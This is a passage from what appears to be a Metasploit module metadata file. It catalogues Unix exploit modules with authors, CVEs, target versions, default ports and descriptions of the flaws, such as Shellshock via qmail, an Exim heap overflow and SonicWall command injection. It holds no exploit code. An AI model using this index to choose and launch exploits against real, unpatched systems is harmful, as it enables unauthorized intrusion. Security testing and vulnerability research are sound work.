"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/unix/local/chkrootkit.rb",
"is_install_path": true,
"ref_name": "unix/local/chkrootkit",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/emacs_movemail": {
"name": "Emacs movemail Privilege Escalation",
"full_name": "exploit/unix/local/emacs_movemail",
"rank": 600,
"disclosure_date": "1986-08-01",
"type": "exploit",
"author": [
"Markus Hess",
"Cliff Stoll",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a SUID installation of the Emacs movemail utility\n to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.\n The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.",
"references": [
"URL-https://en.wikipedia.org/wiki/Movemail",
"URL-https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg",
"URL-http://pdf.textfiles.com/academics/wilyhacker.pdf",
"URL-https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html",
"URL-https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html",
"URL-https://mailutils.org/manual/html_node/movemail.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"/usr/lib/crontab.local"
],
"mod_time": "2018-12-03 12:22:40 +0000",
"path": "/modules/exploits/unix/local/emacs_movemail.rb",
"is_install_path": true,
"ref_name": "unix/local/emacs_movemail",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/exim_perl_startup": {
"name": "Exim \"perl_startup\" Privilege Escalation",
"full_name": "exploit/unix/local/exim_perl_startup",
"rank": 600,
"disclosure_date": "2016-03-10",
"type": "exploit",
"author": [
"Dawid Golunski",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a Perl injection vulnerability in Exim < 4.86.2\n given the presence of the \"perl_startup\" configuration parameter.",
"references": [
"CVE-2016-1531",
"EDB-39549",
"URL-http://www.exim.org/static/doc/CVE-2016-1531.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Exim < 4.86.2"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/local/exim_perl_startup.rb",
"is_install_path": true,
"ref_name": "unix/local/exim_perl_startup",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/netbsd_mail_local": {
"name": "NetBSD mail.local Privilege Escalation",
"full_name": "exploit/unix/local/netbsd_mail_local",
"rank": 600,
"disclosure_date": "2016-07-07",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>",
"akat1"
],
"description": "This module attempts to exploit a race condition in mail.local with SUID bit set on:\n NetBSD 7.0 - 7.0.1 (verified on 7.0.1)\n NetBSD 6.1 - 6.1.5\n NetBSD 6.0 - 6.0.6\n Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.",
"references": [
"URL-http://akat1.pl/?id=2",
"EDB-40141",
"CVE-2016-6253",
"URL-http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/local/netbsd_mail_local.rb",
"is_install_path": true,
"ref_name": "unix/local/netbsd_mail_local",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/local/setuid_nmap": {
"name": "Setuid Nmap Exploit",
"full_name": "exploit/unix/local/setuid_nmap",
"rank": 600,
"disclosure_date": "2012-07-19",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Nmap's man page mentions that \"Nmap should never be installed with\n special privileges (e.g. suid root) for security reasons..\" and\n specifically avoids making any of its binaries setuid during\n installation. Nevertheless, administrators sometimes feel the need\n to do insecure things. This module abuses a setuid nmap binary by\n writing out a lua nse script containing a call to os.execute().\n\n Note that modern interpreters will refuse to run scripts on the\n command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby}\n payloads will most likely not work.",
"references": [
],
"platform": "BSD,Linux,Unix",
"arch": "cmd, x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Command payload",
"Linux x86",
"BSD x86"
],
"mod_time": "2018-01-23 10:12:15 +0000",
"path": "/modules/exploits/unix/local/setuid_nmap.rb",
"is_install_path": true,
"ref_name": "unix/local/setuid_nmap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/distcc_exec": {
"name": "DistCC Daemon Command Execution",
"full_name": "exploit/unix/misc/distcc_exec",
"rank": 600,
"disclosure_date": "2002-02-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module uses a documented security weakness to execute\n arbitrary commands on any system running distccd.",
"references": [
"CVE-2004-2687",
"OSVDB-13378",
"URL-http://distcc.samba.org/security.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 3632,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-07-26 11:23:16 +0000",
"path": "/modules/exploits/unix/misc/distcc_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/distcc_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/polycom_hdx_auth_bypass": {
"name": "Polycom Command Shell Authorization Bypass",
"full_name": "exploit/unix/misc/polycom_hdx_auth_bypass",
"rank": 300,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Paul Haas <Paul.Haas@Security-Assessment.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "The login component of the Polycom Command Shell on Polycom HDX\n video endpoints, running software versions 3.0.5 and earlier,\n is vulnerable to an authorization bypass when simultaneous\n connections are made to the service, allowing remote network\n attackers to gain access to a sandboxed telnet prompt without\n authentication. Versions prior to 3.0.4 contain OS command\n injection in the ping command which can be used to execute\n arbitrary commands as root.",
"references": [
"URL-http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf",
"URL-http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html",
"EDB-24494"
],
"platform": "Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-11-04 06:14:26 +0000",
"path": "/modules/exploits/unix/misc/polycom_hdx_auth_bypass.rb",
"is_install_path": true,
"ref_name": "unix/misc/polycom_hdx_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/polycom_hdx_traceroute_exec": {
"name": "Polycom Shell HDX Series Traceroute Command Execution",
"full_name": "exploit/unix/misc/polycom_hdx_traceroute_exec",
"rank": 600,
"disclosure_date": "2017-11-12",
"type": "exploit",
"author": [
"Mumbai",
"staaldraad",
"Paul Haas <Paul.Haas@Security-Assessment.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "Within Polycom command shell, a command execution flaw exists in\n lan traceroute, one of the dev commands, which allows for an\n attacker to execute arbitrary payloads with telnet or openssl.",
"references": [
"URL-https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-12-04 12:47:40 +0000",
"path": "/modules/exploits/unix/misc/polycom_hdx_traceroute_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/polycom_hdx_traceroute_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/qnx_qconn_exec": {
"name": "QNX qconn Command Execution",
"full_name": "exploit/unix/misc/qnx_qconn_exec",
"rank": 600,
"disclosure_date": "2012-09-04",
"type": "exploit",
"author": [
"David Odell",
"Mor!p3r",
"bcoles <bcoles@gmail.com>"
],
"description": "This module uses the qconn daemon on QNX systems to gain a shell.\n\n The QNX qconn daemon does not require authentication and allows\n remote users to execute arbitrary operating system commands.\n\n This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n and 6.5.0 SP1 (x86).",
"references": [
"EDB-21520",
"URL-https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos",
"URL-http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html",
"URL-http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/misc/qnx_qconn_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/qnx_qconn_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/spamassassin_exec": {
"name": "SpamAssassin spamd Remote Command Execution",
"full_name": "exploit/unix/misc/spamassassin_exec",
"rank": 600,
"disclosure_date": "2006-06-06",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a flaw in the SpamAssassin spamd service by specifying\n a malicious vpopmail User header, when running with vpopmail and paranoid\n modes enabled (non-default). Versions prior to v3.1.3 are vulnerable",
"references": [
"CVE-2006-2447",
"OSVDB-26177",
"BID-18290",
"URL-http://spamassassin.apache.org/advisories/cve-2006-2447.txt"
],
"platform": "Unix",
"arch": "cmd",
"rport": 783,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/misc/spamassassin_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/spamassassin_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/xerox_mfp": {
"name": "Xerox Multifunction Printers (MFP) \"Patch\" DLM Vulnerability",
"full_name": "exploit/unix/misc/xerox_mfp",
"rank": 400,
"disclosure_date": "2012-03-07",
"type": "exploit",
"author": [
"Deral \"Percentx\" Heiland",
"Pete \"Bokojan\" Arzamendi"
],
"description": "This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By\n supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary\n commands under root privileges.",
"references": [
"BID-52483",
"URL-http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf",
"URL-http://foofus.net/goons/percx/Xerox_hack.pdf"
],
"platform": "Unix",
"arch": "cmd",
"rport": 9100,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 10:04:47 +0000",
"path": "/modules/exploits/unix/misc/xerox_mfp.rb",
"is_install_path": true,
"ref_name": "unix/misc/xerox_mfp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/misc/zabbix_agent_exec": {
"name": "Zabbix Agent net.tcp.listen Command Injection",
"full_name": "exploit/unix/misc/zabbix_agent_exec",
"rank": 600,
"disclosure_date": "2009-09-10",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a metacharacter injection vulnerability\n in the FreeBSD and Solaris versions of the Zabbix agent. This flaw\n can only be exploited if the attacker can hijack the IP address\n of an authorized server (as defined in the configuration file).",
"references": [
"CVE-2009-4502",
"OSVDB-60956",
"URL-https://support.zabbix.com/browse/ZBX-1032"
],
"platform": "Unix",
"arch": "cmd",
"rport": 10050,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/misc/zabbix_agent_exec.rb",
"is_install_path": true,
"ref_name": "unix/misc/zabbix_agent_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/polycom_hdx_auth_bypass": {
"name": "Polycom Command Shell Authorization Bypass",
"full_name": "exploit/unix/polycom_hdx_auth_bypass",
"rank": 300,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Paul Haas <Paul.Haas@Security-Assessment.com>",
"h00die <mike@shorebreaksecurity.com>"
],
"description": "The login component of the Polycom Command Shell on Polycom HDX\n video endpoints, running software versions 3.0.5 and earlier,\n is vulnerable to an authorization bypass when simultaneous\n connections are made to the service, allowing remote network\n attackers to gain access to a sandboxed telnet prompt without\n authentication. Versions prior to 3.0.4 contain OS command\n injection in the ping command which can be used to execute\n arbitrary commands as root.",
"references": [
"URL-http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf",
"URL-http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html",
"EDB-24494"
],
"platform": "Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-11-04 06:14:26 +0000",
"path": "/modules/exploits/unix/polycom_hdx_auth_bypass.rb",
"is_install_path": true,
"ref_name": "unix/polycom_hdx_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/smtp/clamav_milter_blackhole": {
"name": "ClamAV Milter Blackhole-Mode Remote Code Execution",
"full_name": "exploit/unix/smtp/clamav_milter_blackhole",
"rank": 600,
"disclosure_date": "2007-08-24",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'\n (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.\n When implemented with black hole mode enabled, it is possible to execute\n commands remotely due to an insecure popen call.",
"references": [
"CVE-2007-4560",
"OSVDB-36909",
"BID-25439",
"EDB-4761"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/smtp/clamav_milter_blackhole.rb",
"is_install_path": true,
"ref_name": "unix/smtp/clamav_milter_blackhole",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/smtp/exim4_string_format": {
"name": "Exim4 string_format Function Heap Buffer Overflow",
"full_name": "exploit/unix/smtp/exim4_string_format",
"rank": 600,
"disclosure_date": "2010-12-07",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a heap buffer overflow within versions of Exim prior to\n version 4.69. By sending a specially crafted message, an attacker can corrupt the\n heap and execute arbitrary code with the privileges of the Exim daemon.\n\n The root cause is that no check is made to ensure that the buffer is not full\n prior to handling '%s' format specifiers within the 'string_vformat' function.\n In order to trigger this issue, we get our message rejected by sending a message\n that is too large. This will call into log_write to log rejection headers (which\n is a default configuration setting). After filling the buffer, a long header\n string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL\n FROM' command. By sending a second message, the string we sent will be evaluated\n with 'expand_string' and arbitrary shell commands can be executed.\n\n It is likely that this issue could also be exploited using other techniques such\n as targeting in-band heap management structures, or perhaps even function pointers\n stored in the heap. However, these techniques would likely be far more platform\n specific, more complicated, and less reliable.\n\n This bug was original found and reported in December 2008, but was not\n properly handled as a security issue. Therefore, there was a 2 year lag time\n between when the issue was fixed and when it was discovered being exploited\n in the wild. At that point, the issue was assigned a CVE and began being\n addressed by downstream vendors.\n\n An additional vulnerability, CVE-2010-4345, was also used in the attack that\n led to the discovery of danger of this bug. This bug allows a local user to\n gain root privileges from the Exim user account. If the Perl interpreter is\n found on the remote system, this module will automatically exploit the\n secondary bug as well to get root.",
"references": [
"CVE-2010-4344",
"CVE-2010-4345",
"OSVDB-69685",
"OSVDB-69860",
"BID-45308",
"BID-45341",
"URL-https://seclists.org/oss-sec/2010/q4/311",
"URL-http://www.gossamer-threads.com/lists/exim/dev/89477",
"URL-http://bugs.exim.org/show_bug.cgi?id=787",
"URL-http://git.exim.org/exim.git/commitdiff/24c929a27415c7cfc7126c47e4cad39acf3efa6b"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/unix/smtp/exim4_string_format.rb",
"is_install_path": true,
"ref_name": "unix/smtp/exim4_string_format",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/smtp/morris_sendmail_debug": {
"name": "Morris Worm sendmail Debug Mode Shell Escape",
"full_name": "exploit/unix/smtp/morris_sendmail_debug",
"rank": 200,
"disclosure_date": "1988-11-02",
"type": "exploit",
"author": [
"Robert Tappan Morris",
"Cliff Stoll",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits sendmail's well-known historical debug mode to\n escape to a shell and execute commands in the SMTP RCPT TO command.\n\n This vulnerability was exploited by the Morris worm in 1988-11-02.\n Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n Currently only cmd/unix/reverse and cmd/unix/generic are supported.",
"references": [
"URL-https://en.wikipedia.org/wiki/Morris_worm",
"URL-https://spaf.cerias.purdue.edu/tech-reps/823.pdf",
"URL-https://github.com/arialdomartini/morris-worm",
"URL-http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"@(#)version.c 5.51 (Berkeley) 5/2/86"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/smtp/morris_sendmail_debug.rb",
"is_install_path": true,
"ref_name": "unix/smtp/morris_sendmail_debug",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/smtp/qmail_bash_env_exec": {
"name": "Qmail SMTP Bash Environment Variable Injection (Shellshock)",
"full_name": "exploit/unix/smtp/qmail_bash_env_exec",
"rank": 300,
"disclosure_date": "2014-09-24",
"type": "exploit",
"author": [
"Mario Ledo (Metasploit module)",
"Gabriel Follon (Metasploit module)",
"Kyle George (Vulnerability discovery)"
],
"description": "This module exploits a shellshock vulnerability on Qmail, a public\n domain MTA written in C that runs on Unix systems.\n Due to the lack of validation on the MAIL FROM field, it is possible to\n execute shell code on a system with a vulnerable BASH (Shellshock).\n This flaw works on the latest Qmail versions (qmail-1.03 and\n netqmail-1.06).\n However, in order to execute code, /bin/sh has to be linked to bash\n (usually default configuration) and a valid recipient must be set on the\n RCPT TO field (usually admin@exampledomain.com).\n The exploit does not work on the \"qmailrocks\" community version\n as it ensures the MAILFROM field is well-formed.",
"references": [
"CVE-2014-6271",
"CWE-94",
"OSVDB-112004",
"EDB-34765",
"URL-https://seclists.org/oss-sec/2014/q3/649",
"URL-https://lists.gt.net/qmail/users/138578"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/unix/smtp/qmail_bash_env_exec.rb",
"is_install_path": true,
"ref_name": "unix/smtp/qmail_bash_env_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/sonicwall/sonicwall_xmlrpc_rce": {
"name": "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",
"full_name": "exploit/unix/sonicwall/sonicwall_xmlrpc_rce",
"rank": 600,
"disclosure_date": "2016-07-22",
"type": "exploit",
"author": [
"Michael Flanders",
"kernelsmith"
],
"description": "This module exploits a vulnerability in SonicWall Global\n Management System Virtual Appliance versions 8.1 (Build 8110.1197)\n and below. This virtual appliance can be downloaded from\n http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a\n holistic way to manage your entire network security environment.'\n\n These vulnerable versions (8.1 Build 8110.1197 and below) do not\n prevent unauthenticated, external entities from making XML-RPC\n requests to port 21009 of the virtual app. After the XML-RPC call\n is made, a shell script is called like so:\n 'timeSetup.sh --tz=\"`command injection here`\"' --usentp=\"blah\"'.",
"references": [
"URL-https://www.digitaldefense.com/digital-defense/vrt-discoveries/",
"URL-https://slides.com/kernelsmith/bsidesaustin2018/#/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SonicWall Global Management System Virtual Appliance"
],
"mod_time": "2019-03-07 10:29:15 +0000",
"path": "/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb",
"is_install_path": true,
"ref_name": "unix/sonicwall/sonicwall_xmlrpc_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/ssh/array_vxag_vapv_privkey_privesc": {
"name": "Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution",
"full_name": "exploit/unix/ssh/array_vxag_vapv_privkey_privesc",
"rank": 600,
"disclosure_date": "2014-02-03",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a default hardcoded private SSH key or default hardcoded\n login and password in the vAPV 8.3.2.17 and vxAG 9.2.0.34 appliances made\n by Array Networks. After logged in as the unprivileged user, it's possible to modify\n the world-writable file /ca/bin/monitor.sh with attacker-supplied arbitrary code.\n Execution is possible by using the backend tool, running setuid, to turn the debug\n monitoring on. This makes it possible to trigger a payload with root privileges.",
"references": [
"OSVDB-104652",
"OSVDB-104653",
"OSVDB-104654",
"PACKETSTORM-125761"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"vAPV 8.3.2.17 / vxAG 9.2.0.34"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb",
"is_install_path": true,
"ref_name": "unix/ssh/array_vxag_vapv_privkey_privesc",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/ssh/tectia_passwd_changereq": {
"name": "Tectia SSH USERAUTH Change Request Password Reset Vulnerability",
"full_name": "exploit/unix/ssh/tectia_passwd_changereq",
"rank": 600,
"disclosure_date": "2012-12-01",
"type": "exploit",
"author": [
"kingcope",
"bperry",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Tectia SSH server for Unix-based\n platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request\n before password authentication, allowing any remote user to bypass the login\n routine, and then gain access as root.",
"references": [
"CVE-2012-5975",
"EDB-23082",
"OSVDB-88103",
"URL-https://seclists.org/fulldisclosure/2012/Dec/12"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix-based Tectia SSH 6.3 or prior"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/unix/ssh/tectia_passwd_changereq.rb",
"is_install_path": true,
"ref_name": "unix/ssh/tectia_passwd_changereq",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/actualanalyzer_ant_cookie_exec": {
"name": "ActualAnalyzer 'ant' Cookie Command Execution",
"full_name": "exploit/unix/webapp/actualanalyzer_ant_cookie_exec",
"rank": 600,
"disclosure_date": "2014-08-28",
"type": "exploit",
"author": [
"Benjamin Harris",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command execution vulnerability in\n ActualAnalyzer version 2.81 and prior.\n\n The 'aa.php' file allows unauthenticated users to\n execute arbitrary commands in the 'ant' cookie.",
"references": [
"CVE-2014-5470",
"EDB-34450",
"OSVDB-110601"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ActualAnalyzer <= 2.81"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/actualanalyzer_ant_cookie_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/arkeia_upload_exec": {
"name": "Western Digital Arkeia Remote Code Execution",
"full_name": "exploit/unix/webapp/arkeia_upload_exec",
"rank": 600,
"disclosure_date": "2013-09-16",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in Western Digital Arkeia Appliance\n version 10.0.10 and lower. By abusing the upload.php script,\n a malicious user can upload arbitrary code to the ApplianceUpdate file in the temp\n directory without authentication. Abusing the local file inclusion in the lang\n cookie to parse this file results in arbitrary code execution, also without\n authentication. The module has been tested successfully on Arkeia 10.0.10. The issues\n have been fixed in version 10.1.10.",
"references": [
"OSVDB-97614",
"OSVDB-97615",
"EDB-28330"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Western Digital Arkeia Appliance 10.0.10"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/arkeia_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/arkeia_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/awstats_configdir_exec": {
"name": "AWStats configdir Remote Command Execution",
"full_name": "exploit/unix/webapp/awstats_configdir_exec",
"rank": 600,
"disclosure_date": "2005-01-15",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\n are vulnerable.",
"references": [
"CVE-2005-0116",
"OSVDB-13002",
"BID-12298",
"URL-http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/awstats_configdir_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/awstats_configdir_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/awstats_migrate_exec": {
"name": "AWStats migrate Remote Command Execution",
"full_name": "exploit/unix/webapp/awstats_migrate_exec",
"rank": 600,
"disclosure_date": "2006-05-04",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based\n payloads are recommended with this module. The vulnerability is only\n present when AllowToUpdateStatsFromBrowser is enabled in the AWStats\n configuration file (non-default).",
"references": [
"CVE-2006-2237",
"OSVDB-25284",
"BID-17844",
"URL-http://awstats.sourceforge.net/awstats_security_news.php",
"EDB-1755"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/awstats_migrate_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/awstats_migrate_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/awstatstotals_multisort": {
"name": "AWStats Totals multisort Remote Command Execution",
"full_name": "exploit/unix/webapp/awstatstotals_multisort",
"rank": 600,
"disclosure_date": "2008-08-26",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.",
"references": [
"CVE-2008-3922",
"OSVDB-47807",
"BID-30856"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/awstatstotals_multisort.rb",
"is_install_path": true,
"ref_name": "unix/webapp/awstatstotals_multisort",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/barracuda_img_exec": {
"name": "Barracuda IMG.PL Remote Command Execution",
"full_name": "exploit/unix/webapp/barracuda_img_exec",
"rank": 600,
"disclosure_date": "2005-09-01",
"type": "exploit",
"author": [
"Nicolas Gregoire <ngregoire@exaprobe.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.",
"references": [
"CVE-2005-2847",
"OSVDB-19279",
"BID-14712",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=19556"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
